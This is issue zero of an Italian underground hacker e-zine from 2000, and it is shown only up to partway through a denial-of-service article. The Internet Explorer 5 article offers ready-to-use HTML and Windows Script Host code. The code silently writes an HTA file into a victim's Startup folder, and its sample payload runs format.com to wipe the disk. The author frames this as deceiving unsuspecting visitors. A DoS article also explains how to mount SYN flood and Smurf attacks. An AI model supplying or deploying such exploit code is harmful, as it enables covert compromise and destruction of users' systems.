Copy Link
Add to Bookmark
Report

Underground Magazine 00

eZine's profile picture
Published in 
Underground Magazine
 · 5 years ago

  


,-'`^_,-~>L'Underground Magazine Crew<~-,_^`'-,
|^`-_,-'`PR3§3NTA`'-,_,-`^|


,,,,,,Þ......Þ,,,,,,
``` __ __ _ _ ```
'{ | | | | | `\ /` | '}
(' | | | | | ' | )'
'{ | | | | | |'| | '}
(' ' `` ' | | | | )'
^ `------` `--` `--` ^
```,'''''''''''''''''''',```
}'Underground Magazine'{
`''''''''''''''''''''`

{Powered by Cookbooker}
,,,,,.....................,,,,,
,-'`^_,-*>Underground Magazine<*-,_^`'-,
`'^'~*-,._.,-*>Numero 0<*-,._.,-*~'^''`
`'^'-~>Anno 0 31/Ottobre/Y2K<~-'^''`
`'^'-~> notte di H4LL0W3EN <~-'^''`
''''''''''''''''''''



---------------------------------------------------------------------

Introduzione by C00KB00K3R
Be, ce l'abbiamo fatta: finalmente questa dannata e-zine è nata, ora non ci
rimane che farla sopravvivere ;o). Già, perchè è questo il difficile, sopravvivere,
questo vale per l'e-zine come per noi, se non avete capito perkè, provate ad uscire
fuori di casa qualke volta...
Komunque dipende tutto da voi, infatti questa rivista, totalmente aperiodica
:op , uscirà ogni volta che avrà a disposizione un soddisfacente numero di
artikoli, ma attenzione, non accettiamo qualsiasi materiale, gli artikoli
devono attinersi agli argomenti della rivista e devono essere di una certa
qualità, insomma non accettiamo qualsiasi merda che ci passa sottomano...
anke se per questo numero abbiamo fatto qualke eccezione... ;o)
Ma adesso basta kon queste kazzate (ke probabilmente una buona parte di voi
avrà sicuramente saltato ;o), godetevi questi artikoli nati dall'impegno di
tutta l'Underground Magazine CREW, che colgo l'occasione di ringraziare per la
loro disposizione. :o)
Ora non mi rimane che augurarvi di rivederci presto ed una buona lettura ... ByeZ ;o)


ATTENZIONE: se vedete delle righe lunghe un paio di Km e a meno che non abbiate un monitor da 50 pollici :op selezionate "allineato alla finestra" dalle Opzioni. Se vi fa ankora pena vuol
dire che non l'avete aperto kon wordpad (l'e-zine è stata otimizzata per il buon vecchio wordpad, per un monitor da 17'' ed una risoluzione di 800X600...) o ke fa pena veramente... :op
Per leggere questo testo vi consiglio di cambiare la risoluzione in 800X600, a meno che non abbiate un monitor lillipuziano... ;o)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Manifesto dell'UNDERGROUND MAGAZINE Crew:

Siamo hacker, cracker, phreaker, cyberpunk, anarchici e rivoluzionari di un sistema che ci va
ormai stretto. Siamo "gente comune" molto diversa fra noi, ma siamo un gruppo, un gruppo unito
da un desiderio comune: rivoluzionare il Sistema; oguno a suo modo (l'hacker e il cracker grazie alle loro conoscenze informatiche, il phreaker grazie alle sue capacità tecniche,...), ma tutti uniti per un mondo diverso, migliore, che rispetti le idee e la libertà di tutti. Vi sembrerà un'utopia, la fantasia di una mente malata (ah, grazie :o), ma qualcuno dovrà pur cominciare... ;o)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ed ora la parte che odio di più, il disclaimerD :op ...
_____________________
/ . . (<$$$$$>Disclaimer<:::::>)
. . . _/~~~~~~~~~~~~~~~~~~~~~~~~~~\_ . . . \
.( . . /~ ~\ . . .
( . . .~ ~. . )
()\/_____ _____\/() . . ).
( .-'' ~~~~~~~~~~~~~~~~~~~~~~~~~~~ ``-. ...
. . . .-~ __________________ ~-. . /
. ..`~~/~~~~~~~~~~~~TTTTTTTTTTTTTTTTTTTT~~~~~~~~~~~~\~~' . ) .
. .| | | #### #### || | | | [] | | | || #### #### | | | .
( ;__\|___________|++++++++++++++++++|___________|/__;. .
. (~~====___________________________________====~~~)
( . .. \------____________[-PULA-]______________------/ .. . )
. | || ~~~~~~~~ || |
\_____/ \_____/

Disclaimer:
L'UNDERGROUND MAGAZINE CREW NON SI ASSUME ALCUNA RESPONSABILITA' PER IL "MAL" UTILIZZO DI QUESTA E-ZINE ED IMPONE A COLUI CHE VUOLE CONTINUARE QUESTA LETTURA I SEGUENTI TERMINI: "NON INCOLPERO' ALCUN MEMBRO DELL'UMc, NESSUNO ATTRAVERSO IL QUALE HO RICEVUTO QUESTA RIVISTA, NESSUNO CHE HA COLLABORATO IN QUALSIASI MODO ALLA CREAZIONE DI QUEST'E-ZINE; ACCETTO IL FATTO CHE QUESTO TESTO E' NATO PER IL SINGOLO SCOPO DI INFORMARE IL LETTORE E NON VUOLE IN ALCUN MODO INDURLO A COMPIERE AZIONI ILLEGALI; COMPRENDO INOLTRE CHE INFORMARE NON E' ILLEGALE.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DEDICHE:
dedico questo primo numero a tutti membri delle altre e-zine, a tutti quelli
che lottano per la libertà, la pubblica informazione e tutto ciò in cui credono.
Dedico questo numero a chi crede sinceramente nei propri ideali ed a quello
che fa, fregandosene di quello che pensa il resto della massa.
Dedico questo numero a tutti, a tutti quelli che hanno il "
coraggio" di alzarsi la mattina sapendo quello che dovranno affrontare, che si accontentano delle piccole gioe e riescono ad andare avanti ripensando a queste.
Dedico questo numero a voi lettori, che dimostrate, leggendo questa rivista, che il nostro lavoro è servito a qualcosa, che c'è ancora qualcuno che crede nella libera informazione, in noi e nel divertimento di fare a pezzi una centralina soltanto per vedere
cosa c'è dentro :o))
Dedico questo numero a voi, che leggendo questo cumulo di KB diventate le nostre "
piccole gioe" (kome sono poetiko oggi... eheh:o)).
Ma soprattutto dedico questo numero a tutti i nostri collaboratori, senza i quali questa e-zine
non sarebbe mai nata!
Enjoy! ;o)

Cookbooker, UMc's member.

Nota by Cook: spero di non avervi depresso troppo kon ste "
dediche", ma oggi ero un po giù... ;o)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
,~~~~~~~,________________________________________________________________
|ANNUNCI| 1)Chiunque voglia scrivere per Underground Magazine e si sente`'.
`~~~~~~~` all'altezza ;] di far parte dell'UM crew mi scriva a questo |
indirizzo: |
cookbooker@libero.it con il subject "
UMc richiesta collaboratore". |
2)Chi non ha tempo, non se la sente o semplicemente si vergogna :) di |
scrivere per noi ma vuole collaborare mi scriva (cookbooker@libero.it) |
segnalandoci errori (subject: UM errori), news (subject: UM news) o |
qualsiasi altra cosa. |
Le sue e-mail, se verranno ritenute interessanti, verranno pubblicate |
nel prossimo numero. `
'-------------------------------------------------------------------------'

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ALL3G4T|

EXPLOIT.zip Esempio pratiko dell'exploit trattato nell'artikolo "
Altro exploit in I.E."
Artikolo_reti.zip Artikolo originale sulle reti di Ulisses1
Jolt2.zip I sorgenti di un interessante programma di cui parleremo nel prox numero
Echelon.zip Artikolo originale su Echelon di Cujo kon alkune foto riguardanti il "
grande orecchio" ;)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

___________________________________________________________________________


,-----------------------------------------------------------------------,
<~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Sommario~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>
'-----------------------------------------------------------------------'
,^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^,
|\\\\Titolo artikolo////<<<<<<<<<<<<<o>>>>>>>>>>>>>\\\\AUTORE////<<<<>>>>|
|^'<>################################################################<>'^|
|^'><##############################INTRO#############################<>'^|
|^'<>################################################################<>'^|
|>>Introduzione<<<<<<<<<<<<<<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>>|
|>>-Manifesto--<<<<<<<<<<<<<<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>>|
|>>-Disclaimer-<<<<<<<<<<<<<<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>>|
|>>-Dediche----<<<<<<<<<<<<<<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>>|
|>>-Annunci----<<<<<<<<<<<<<<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>>|
|>>-Allegati---<<<<<<<<<<<<<<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><############################HACKING#############################<>'^|
|^'<>################################################################<>'^|
|>>Altro exploit in I.E.-----<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>|
|>>Classificazioni delle reti<<<<'^^'<<<<<<<<<<Ulisses1>>>>>>>>>>>>>>>>>>|
|>>Dal DoS al DDos-----------<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>|
|>>Trojan horse--------------<<<<'^^'<<<<<<<<<<Fabripal>>>>>>>>>>>>>>>>>>|
|>>Lista proxy---------------<<<<'^^'<<<<<<<<<<Rhost>>>>>>>>>>>>>>>>>>>>>|
|>>Tutorial Server FTP NT----<<<<'^^'<<<<<<<<<<Rhost>>>>>>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><##########################Programming###########################<>'^|
|^'<>################################################################<>'^|
|>>Pascal, lesson 1----------<<<<'^^'<<<<<<<<<<EvilAngel>>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><###########################Phreaking############################<>'^|
|^'<>################################################################<>'^|
|>>Introduzione al Phreaking-<<<<'^^'<<<<<<<<<GoNe PoSt@L>>>>>>>>>>>>>>>>|
|>>Pikkola grande guida al...<<<<'^^'<<<<<<<<<GoNe PoSt@L>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><############################Anarchy!############################<>'^|
|^'<>################################################################<>'^|
|>>ANARCHIA------------------<<<<'^^'<<<<<<<<<<Raven>>>>>>>>>>>>>>>>>>>>>|
|>>fare diversi tipi di micce<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>|
|>>Ideuzza chimica-----------<<<<'^^'<<<<<<<<<<Raven>>>>>>>>>>>>>>>>>>>>>|
|>>Stink bomb (Anarchy?ahah)-<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>|
|>>La bomba Molotov----------<<<<'^^'<<<<<<<<<<Raven>>>>>>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><############################Narcos##############################<>'^|
|^'<>################################################################<>'^|
|>>Ohi, Marija!--------------<<<<'^^'<<<<<<<<<<Raven>>>>>>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><############################LINUX###############################<>'^|
|^'<>################################################################<>'^|
|>>Come farsi una shell------<<<<'^^'<<<<<<<<<<BUDDAMONK>>>>>>>>>>>>>>>>>|
|>>Installare Linux Slackware<<<<'^^'<<<<<<<<<<BUDDAMONK>>>>>>>>>>>>>>>>>|
|>>Un primo passo verso Unix-<<<<'^^'<<<<<<<<<<BUDDAMONK>>>>>>>>>>>>>>>>>|
|>>Appunti/guida alla RED HAT<<<<'^^'<<<<<<<<<<BUDDAMONK>>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><###########################WRITING##############################<>'^|
|^'<>################################################################<>'^|
|>>Introduzione al writing---<<<<'^^'<<<<<<<<<<FREESTO>>>>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><#########################Masterizzare###########################<>'^|
|^'<>################################################################<>'^|
|>>Come creare cd non dupli..<<<<'^^'<<<<<<<<<<Rhost>>>>>>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><#############################DOS################################<>'^|
|^'<>################################################################<>'^|
|>>Il buon vecchio DOS-------<<<<'^^'<<<<<<<<<<EVILANGEL>>>>>>>>>>>>>>>>>|
|^'<>################################################################<>'^|
|^'><#############################INFO###############################<>'^|
|^'<>################################################################<>'^|
|>>NewZ----------------------<<<<'^^'<<<<<<<<<<Cookbooker/Rhost>>>>>>>>>>|
|>>Il grande orecchio:Echelon<<<<'^^'<<<<<<<<<<CUJO>>>>>>>>>>>>>>>>>>>>>>|
|>>LINKZ---------------------<<<<'^^'<<<<<<<<<<Cookbooker>>>>>>>>>>>>>>>>|
|^'><##########################KONKLUSIONE###########################<>'^|
`^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^`

,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,
~<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<~
~<<<<<<<<Underground Magazine>>>>>>>>>>~
~<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<~
`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`



³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~0~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~o~~~o~~~ooo~~~~oooo~~o~~o~~o~~oo~~~o~~~oooo~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~o~~~o~~o~~~o~~o~~~~~~o~o~~~o~~o~o~~o~~o~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~ooooo~~ooooo~~o~~~~~~oo~~~~o~~o~~o~o~~o~~oo~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~o~~~o~~o~~~o~~o~~~~~~o~o~~~o~~o~~o~o~~o~~~o~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~o~~~o~~o~~~o~~~oooo~~o~~o~~o~~o~~~oo~~~ooo~~~~~~~~~~~~~~~~~~
³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³



|¤³>################################################################<³¤|
|¤³<###################internet Explorer 5 Exploit##################<³¤|
|¤³>################################################################<³¤|


Inizio cazzate.
Autore: Cookbooker
Musica ascoltata: It's my life, Frena, Dio è morto, La regina del celebrità, ...
Saluti: Shademanone, ^1STRONZO (si chiama kosì...), Nightnavigator e ^Matrix.
Cibo: Ramadham (eheh) :oO
fine cazzate.

Un'altro buco è stato trovato nel famoso Internet Explorer che somgilia sempre più ad un fetta di Emmenthal...
Questo nuovo buco sfrutta, come molti altri, l'integrazione di Office con il web e consente, con l'ausilio di Excel, del sempre utile Notepad e di un po di furbizia, di creare una pagina web che inserisce nel computer della vittima un file eseguibile di tipo HTA (HTML For Applications) direttamente nella cartella "
Esecuzione Automatica" di Win$oZz. Il tutto avviene in maniera che il navigatore non si possa accorgere della "visita" dato che, a differenza dei controlli ActiveX, l'ignaro utente non viene avvisato dell'azione ke è stata kompiuta sul suo pc.
Bel buco, non trovate? ok raga... il mio tempo è finito... alla ProX!

>Be, e adesso? Ci hai tentati con un Exploit del genere e non ci spieghi come fare a sfruttarlo!?
Ok, ok, scherzavo... :o) volete proprio sapere kome sfruttare questo bel BUG, eh? Allora continuate a leggere! ;)

Allora per prima kosa dovete usare Excel per creare un file XLS... fatto? Ma che bravi... bene, ora dovete scrivere il seguente codice, che con una minima conoscenza del WSH (Windows Scripting Host) potrete modificare a piacimento...

o/
``````````````````°\```````taglia_qui`````````````````````````````````````

<OBJECT ID='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' > </OBJECT> <SCRIPT> wsh.Run('C:\\WINDOWS\\Format.com'); </SCRIPT>

o/
``````````````````°\```````taglia_qui`````````````````````````````````````



Il programma che vogliamo fare eseguire al nostro ignaro navigatore al prossimo riavvio deve essere specificato in questa parte di script:
wsh.Run('perkorso del file')
Ora non ci rimane di creare una pagina HTML (Hyper Text Markup Language) che richiamerà lo script e fungerà da cavallo di troia per ingannare la nostra "
vittima":

o/
``````````````````°\```````taglia_qui`````````````````````````````````````


<html>

<head>
<title>Internet Explorer Exploit</title>
<META content="
MSHTML 5.00.2314.1000"
name=GENERATOR></HEAD></head>

<p align="
center"><BR>
Attendere... caricamento della pagina in corso...</p>
<p align="
center">
<OBJECT data=trojan.xla height=0 id=sh1 width=0></OBJECT>

<SCRIPT>
function f()

{
fn="
C:\\windows.000\\Menu Avvio\\Programmi\\Esecuzione Automatica\\TROJAN.HTA";
sh1.object.SaveAs(fn,6);
alert("
Caricamento della pagina completato.");
}
setTimeout("
f()",6200);
</SCRIPT>

</body>

</html>


</HTML>

o/
``````````````````°\```````FINE'''`````````````````````````````````````


Questo exploit usa un bug che konsiste nel fatto di non specificare in quale parte del disco fisso la funzione SaveAs salva il file di excel, possiamo quindi essere noi a specificare in quale locazione salvarlo (grazie al parametro "
fn") e, grazie al file XLA, possiamo eseguire del codice sul computer del navigatore (con il comando "wsh.Run") ed obbligarlo così ad avviare determinati programmi, anche dannosi (come il file format.com).

per altre info visitate il sito dello scopritore dell'Exploit: http://www.guninski.com

Ok raga, vedete di non fare i lamerD con queste info, usatele a "
puro scopo informativo" (eheheh).
ByeZ, Cookbooker.

€NJ0Y! ;o)



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#############################LE RETI############################<³¤|
|¤³>################################################################<³¤|


Autore: Ulisses1

Allora vediamo un po'... sono le 5:30 del mattino e io sono a lavoro per AIS e UM per mettere
insieme i vari articoli e appunti che ho in giro per la casa.

Disclaimer:
Se vi beccano o vi fate beccare (c'è una grossa differenza) se potete cercate di non fare il mio
nome.. se poi proprio non resistete alla tentazione e vabbè fatelo il mio nome non me la prendo.
Cmq se leggendo il seguente articolo troverete errori mi farebbe molte piacere se evitaste di
farmelo sapere. Grazie anticipatamente.

Ok ora possiamo iniziare senza ulteriori interruzioni.
Oggi parleremo della "
classificazione delle reti"
Facendo un po' di teoria potremmo dire che una rete dati può essere definita, in generale, come
l'insieme degli elementi necessari per poter effettuare una connessione tra più computers
dislocati in sedi differenti.
Quindi lo scopo di una rete è quello di dare la possibilita di intercomunicazione tra più utenti.
Quando una persona richiede l'uso di risorse non presenti nel suo ambiente questa persona è
detta Utente Remoto.
Gli accessi remoti sono solitamente ottenuti tramite un terminale ed un mezzo di comunicazione
che lo collega all'elaboratore principale. Un esempio può essere il sistema di prenotazione di
posti delle compagnie aeree.
Le reti possono variare in dimensione e tipologia, ma fondamentalmente vengono usate nei seguenti
modi:
Un utente che deve colloquiare con un altro utente;
Un utente che deve interrogare un database presente su un computer;
Più computers che interagiscono fra di loro tramite la rete dati;

Gli elementi fondamentali di una rete sono:

I Terminali: Sono dei mezzi fisici che interfacciano gli utenti, gli host computers e la rete;

I Nodi: Sono dei computers utilizzati principalmente come commutatori;

Gli HOST COMPUTERS: Sono computers la cui funzione è quella di accettare delle informazioni, di
applicare ad esse dei processi di elaborazione e di inviare in uscita i
risultati;

I Collegamenti: Sono delle linee di comunicazione che uniscono gli host computers, i nodi e i
terminali per formare l'intera rete;

Per quanto riguarda i collegamenti, questi possono essere sia DEDICATI che COMMUTATI.
Un collegamento si dice DEDICATO se unisce due o più punti di una rete in maniera permanente.
Una rete, può, ad esempio, comprendere un certo numero di collegamenti dedicati che convergono
tutti ad un NODO CENTRALE il quale gestisce il traffico tra le differenti linee che ad esso
afferiscono, producendo un tipo di configurazione CENTRALIZZATA.





Reti molto grandi, ad esempio sparse sull'intero territorio nazionale, possono avere un certo
numero di nodi centrali che comunicano tra loro tramite un unico collegamento ad alta velocità.
In tal caso i terminali vicini gli uni agli altri possono essere collegati con dei concentratori
che a loro volta sono collegati al nodo centrale.
In questo modo si ottiene una più efficace utilizzazione delle linee di comunicazione in quanto
i concentratori, concentrando in sé l'attività di più linee, permettono a più terminali di
utilizzare lo stesso collegamento.
I CONCENTRATORI, che possono essere ad esempio dei mini computers, permettono inoltre di ridurre
i costi in quanto sono abilitati ad accettare informazioni da vari terminali tramite delle linee
a bassa velocità e a ritrasmetterle su di un'unica linea ad alta velocità.




In ogni caso si parla di DTE (Data Terminal Equipment) con riferimento alle apparecchiature
utente che accedono alla rete attraverso un'interfaccia di accesso.
I DTE, possono corrispondere, ad esempio, sia ad un terminale semplice che desidera instaurare
un colloquio con un altro DTE, sia ad un elaboratore capace di gestire contemporaneamente altri
DTE.
Con la sigla DCE (Data Circuit Terminating Equipment) si indicano le apparecchiature di
terminazione del circuito dati, ossia l'insieme degli organi fisici usati per convogliare le
informazioni tra due nodi come:
Il canale di comunicazione;
Il modem;

Comunque, il collegamento tra computers a livelli diversi dà vita a reti di dimensioni diverse
che possiamo così classificare:

LAN (Local Area Network) - Si tratta di reti che collegano computers a breve distanza fra loro,
per esempio all'interno di uno stesso ufficio oppure a diversi uffici di una stessa area
aziendale;

MAN (Metropolitan Area Network) - Si tratta di reti a livello di area metropolitana, in questo
caso vengono collegati computers che si trovano all'interno di un'area urbana di grandi
dimensioni oppure più paesi o cittadini collocati in zone limitrofe;

WAN (Wide Area Network) - Comprende Computers collegati in ambito nazionale fino a considerare
reti che collegano pc in diversi stati limitrofi;

GAN (Global Area Network) - Si tratta di una rete che collega computers collegati in vari
continenti e il tutto avviene via satellite;

E' tramite la rete GAN che viaggiano le informazioni che utilizziamo tutti i giorni: da quelle
radiotelevisive a quelle metereologiche, ecc.
Vi sono due sistemi per costruire un dialogo fra due computers che si differenziano
principalmente per il metodo usato per il trasferimento dati dalla stazione sorgente alla
stazione destinataria e sono:
STORE AND FORWARD
BROADCASTING

Il metodo STORE AND FORWARD permette la ricerca della via più breve (ROUTING) tra le stazioni da
collegare. Il sistema di gestione sceglie il percorso controllando le stazioni libere e
memorizzandovi temporaneamente i dati.
L'altro metodo, BROADCASTING, prevede invece il trasferimento diretto dei dati dalla stazione
sorgente a quella destinataria evitando la memorizzazione alle stazioni intermedie.
In questo caso non è possibile che più stazioni trasmettano informazioni contemporaneamente in
quanto si avrebbe una sicura collisione di dati. Ciò non si verifica per il metodo STORE AND
FORWARD, per cui in questo caso diventa l'ideale per le reti MAN, WAN e GAN.
Mentre le reti LAN utilizzano generalmente il metodo BROADCASTING.

Ore 07:31. Credo di aver finito.. sono distrutto. Questa notte ho dovuto mettere insieme appunti
che non vedevo da anni... per questo lavoraccio i cari 0ldi e Cook mi devono un caffè a testa. =)
Byez

Ulisses1



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



|¤³>################################################################<³¤|
|¤³<#######_,-~'\!!!_Denial of Service, e che è?!?_!!!/'~-,_########<³¤|
|¤³>################################################################<³¤|


_,-~'\!!!_Denial of Service, e che è?!?_!!!/'~-,_

Autore: Cookbooker

Cazzate varie:

Tempo impiegato: 23 ore, 15 minuti e 5 secondi, mi spiace per i decimi,
ma ho perso il conto... :o)

Tempo di "
lavoro effettivo": 4/5 ore ;o)

Cibo consumato: allora,mi tocca elencarvi tutto quello che ho mangiato in un
giorno? Meglio di no, se no non ho lo spazio per l'aricolo :o) Quindi mi
limiterò a scrivere il cibo che mi sono mangiato durante il "
tempo di lavoro
effettivo" :o) allora: 1 cono gelato, un biscotto gelato :o(!), un bicchiere
di coca (cola:), un panino e mezzo (gigante), un bel po di te (molto) freddo
e un pacchetto di LoHacker (i crackers li avevo finiti... ;).

Musica ascoltata: sono in "
vacanza" in montagna, isolato da tutto e da tutti
(tranne che dai montanari-zombie che hanno invaso questo dannato buco!), mi
sono dovuto portare dietro il mio computer vecchio :(perchè non ho un
portatile!?), ed il lettore cd di questo computer non va, quindi mi tocca
ascoltare "
Radio Studio Nord, oggi per voi solo canti alpini!" :o(

Note:
- ho scoperto come abbattare questi dannati montanari-zombie (vedi sopra §o):
a quanto pare i canti alpini hanno un effeto devastante su questi esseri...
li induce all'autodistruzione per autocombustione! :o))
-comprare 17 pacchetti di LoHacker
-fare castrare il cane
-fare castrare la cagna
-castrare manualmente, con l'ausilio di apposite pinzette, Bill GateZ
-fare una risatina satanica per la battuta sopra :o|MuAhAhAh!)
-comprare una cassetta di quei melodiosi canti alpini: non si sa mai,
qualche montanaro-zombie potrebbe avermi seguito fino a casa ;)

DisclaimerD poetico
"
dedicato a chi se lo merita":
se vuoi continuare a respirare
il Cookbooker in pace devi lasciare
quindi usa in cervello
e non fare il coglione
oh il mio bimbo bello
e se la pula vuoi chiamare
io all'inferno ti verrò andare!
:o(MuAhAhAhAhZz!)

Disclaimer "
serio": A parte gli scherzi (e i disclaimer scemi...), non credo
ci sia niente di male ne di illegale (ho fatto la rima :o) in quello scritto
nel mio articolo, dopo tutto è "
solo a scopo informativo";o) ed informare non
mi sembra sia illegale, forse in TELECOMlandia o in Russia.... ;o)
Insomma, sono un'angioletto!
O§o)

Si comincia!

Spinto dalle continue pressioni fattomi (come sono colto... :o) da diversi
conoscenti... ok ok... nessuno mi ha chiesto niente, ma mi sembrava un bel modo per cominciare... purtroppo mi sono accorto che un'introduzione del genere detta da me
perde di credibilità...
;o)

Ok, basta con le cazzate e cominciamo!

Molti si saranno chiesti (ma non mi hanno chiesto =) come hanno fatto colossi
come Yahoo! e AOL, il Febbraio scorso, a cadere sotto gli attacchi di
(presunti) hackers. La risposta sta nel D.o.S., non il sistema operativo
targato Bill GateZ (che probabilmente è ancora più distruttivo ;o), ma un
tipo di attacco battezzato Denial of Service (negazione di servizio, appunto).

D.o.S
Probabilmente la prima utility a dar vita ad un D.o.S. è stata WinNuke,
questa sfruttava un bug di Winzzo$: apriva una connessione con la porta 139
(NetBios) e mandava un particolare pacchetto di dati in grado di mandare in
tilt il sistema causando la tanto odiata schermata blu :o(argh!).
Altri attacchi di tipo Denial of Service sono l'attacco Smurf e il SYN flooding.
Quest'ultimo si basa sul 3Way Handshaking ed è stato il primo attacco D.o.S.
di cui si ha notizia.

Come Funziona il SYN flooding:
Prima di tutto vediamo di spiegare cos'è il 3Way Handshaking (un nome più
semplice non c'era??). All'inizio di una comunicazione fra 2 dispositivi
come un server web ed il nostro computer (client) avviene uno scambio di
informazioni, di pacchetti. La nostra macchina invia un pacchetto contenente
il flag SYN che serve a richiedere una connessione, a questo punto il server
ci risponderà con due flag: uno SYN ed uno ACK; il nostro host risponderà
anche lui con un pacchetto SYN/ACK ed ora può finalmente cominciare il
trasferimento dei dati. A noi, quindi, basterà inviare un bel po di pacchetti
SYN (da qui deriva il termine SYN flooding) alla nostra vittima, senza però
rispondere ai suoi SYN/ACK e quindi senza porre fine al meccanismo di
Handshaking. Volete sapere quali saranno gli effetti di questo attacco? Le
risorse del server web si esuariranno ed impediremo così ad altri utenti di
accedere al server, negando così un servizio (Denial of Service).

3Way Handeshaking:
________ ________
| | | |
| | | |
| :o) | | :o( |
,_|________|_, ,_|________|_,
| | ------------------SYN-------------------> | |
| Client | <---------------SYN/ACK------------------ | SERVER |
|____________| ----------------SYN/ACK-----------------> |____________|

'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Ora passiamo ad un attacco più evoluto ed efficace...

!,-'°Smurf attack'°-,!
Anche lo Smurf è un tipo di attacco D.o.S., è stato proprio lui l'"
arma"
degli agressori di Yahoo! e affini. Lo Smurf attack, come gli altri attacchi
D.o.S., si "
limita" a paralizzare un servizio, ora vedremo come.

Come funziona lo Smurf Attack:
Cnn, Aol, eBay, Amazon, Yahoo!,... sono tutti stati vittime dello Smurf
Attack ed hanno fatto da esempio: gli aggressori hanno sicuramente voluto
fare intendere che nella Rete niente è sicuro, che loro possono attaccare
e distruggere chiunque, anche i giganti americani. Ma ora vediamo il
"
procedimento" per attuare uno Smurf attack.
La prima cosa da fare è ricercare nella Rete dei router che permettono di
scoprire l'ip broadcast di un network, vale a dire l'indirizzo di una
determinata rete. Ora che abbiamo il nostro IP Broadcast Address non ci
rimane che sfruttare il broadcast ping; a questo punto alcuni di voi si
saranno fermati e staranno pensando:"
Ma che cazzo sta a dì codesto pazzo!?!"
